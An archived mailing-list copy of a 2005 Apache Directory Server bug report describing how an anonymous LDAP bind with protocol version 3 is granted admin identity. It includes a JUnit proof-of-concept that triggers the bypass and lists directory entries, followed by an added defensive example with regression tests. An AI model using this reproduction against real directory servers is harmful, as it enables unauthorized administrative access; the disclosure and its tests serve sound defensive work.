directory-dev mailing list archives

From "Endi S. Dewata (JIRA)" <>
Subject [jira] Created: (DIREVE-239) Anonymous user may gain access as admin user
Date Wed, 31 Aug 2005 00:45:04 GMT
Anonymous user may gain access as admin user

         Key: DIREVE-239
     Project: Directory Server
        Type: Bug
    Versions: 0.9.3
    Reporter: Endi S. Dewata
 Assigned to: Alex Karasulu

Anonymous user may gain access as admin user by specifying java.naming.ldap.version=3 in the
JNDI client.

To show the problem, add a print statement in the at line 369:

                // perform the authentication
                LdapPrincipal authorizationId = authenticator.authenticate( ctx );
                System.out.println("Authorization ID: "+authorizationId);

Start the server, then run the following program:

import junit.framework.TestCase;
import javax.naming.Context;
import javax.naming.NamingEnumeration;
import javax.naming.directory.DirContext;
import javax.naming.directory.InitialDirContext;
import javax.naming.directory.SearchControls;
import javax.naming.directory.SearchResult;
import java.util.Hashtable;

public class Test extends TestCase {

    public void testAnonymousBindWithLDAPVersion3() throws Exception {

        String suffix = "dc=apache,dc=org";

        // No SECURITY_PRINCIPAL / SECURITY_CREDENTIALS are set, so this is an anonymous bind.
        Hashtable<String, String> env = new Hashtable<String, String>();
        env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.ldap.LdapCtxFactory");
        env.put(Context.PROVIDER_URL, "ldap://localhost:10389/");
        // Uncomment the next line to reproduce: with LDAP version 3 the server prints
        // the admin authorization ID instead of an empty one.
        // env.put("java.naming.ldap.version", "3");

        DirContext ctx = new InitialDirContext(env);

        SearchControls sc = new SearchControls();

        // Search the suffix with a match-all filter; what comes back depends on
        // which identity the server assigned to this (supposedly anonymous) bind.
        NamingEnumeration<SearchResult> ne = ctx.search(suffix, "(objectClass=*)", sc);

        System.out.println("Search results:");

        int counter = 0;
        while (ne.hasMore()) {
            SearchResult sr = ne.next();
            String rdn = sr.getName();
            System.out.println(" - " + ("".equals(rdn) ? suffix : rdn + "," + suffix));
            counter++;
        }

        System.out.println("Found " + counter + " entries.");

        ctx.close();
    }
}


Without java.naming.ldap.version=3 the user remains anonymous (the printed authorization
ID is empty). With java.naming.ldap.version=3, however, the anonymous user is authenticated
as the admin user without supplying any password at all.
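The invariant this bug breaks is that whether a simple bind is anonymous must be decided from the bind DN and password alone, never from the protocol version the client negotiated. The following is an added example, not ApacheDS code: a hypothetical, simplified bind classification (`classify`) with JUnit 3 regression tests in the style of the report above; the `cn=admin,dc=apache,dc=org` DN is a constructed sample value.

```java
import junit.framework.TestCase;

// Hypothetical server-side bind classification (not the Directory Server's own code).
// The outcome depends only on the DN and the password; the LDAP version is validated
// but must not influence the decision.
public class BindClassificationTest extends TestCase {

    enum Outcome { ANONYMOUS, UNAUTHENTICATED_REJECTED, SIMPLE_AUTH }

    // Assumed decision logic; the actual credential check happens later and is out of scope.
    static Outcome classify(int ldapVersion, String bindDn, byte[] password) {
        if (ldapVersion != 2 && ldapVersion != 3) {
            throw new IllegalArgumentException("unsupported LDAP version " + ldapVersion);
        }
        boolean noDn = bindDn == null || bindDn.trim().length() == 0;
        boolean noPassword = password == null || password.length == 0;
        if (noDn && noPassword) {
            return Outcome.ANONYMOUS;           // anonymous bind, whatever the version
        }
        if (noPassword) {
            // A DN with an empty password is an "unauthenticated" bind; RFC 4513 5.1.2
            // says servers should refuse it rather than treat it as a successful login.
            return Outcome.UNAUTHENTICATED_REJECTED;
        }
        return Outcome.SIMPLE_AUTH;             // only now is the credential verified
    }

    // Constructed sample DN for the tests below.
    private static final String ADMIN_DN = "cn=admin,dc=apache,dc=org";

    public void testVersionDoesNotChangeAnonymousOutcome() {
        assertEquals(Outcome.ANONYMOUS, classify(2, "", null));
        assertEquals(Outcome.ANONYMOUS, classify(3, "", null));
        assertEquals(Outcome.ANONYMOUS, classify(3, null, new byte[0]));
    }

    public void testDnWithoutPasswordIsNotALogin() {
        assertEquals(Outcome.UNAUTHENTICATED_REJECTED, classify(2, ADMIN_DN, new byte[0]));
        assertEquals(Outcome.UNAUTHENTICATED_REJECTED, classify(3, ADMIN_DN, null));
    }

    public void testCredentialedBindGoesToAuthenticator() {
        assertEquals(Outcome.SIMPLE_AUTH, classify(3, ADMIN_DN, "secret".getBytes()));
    }
}
```

A test of this shape, run against the real authenticator, would have caught the version-3 case described above before release.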
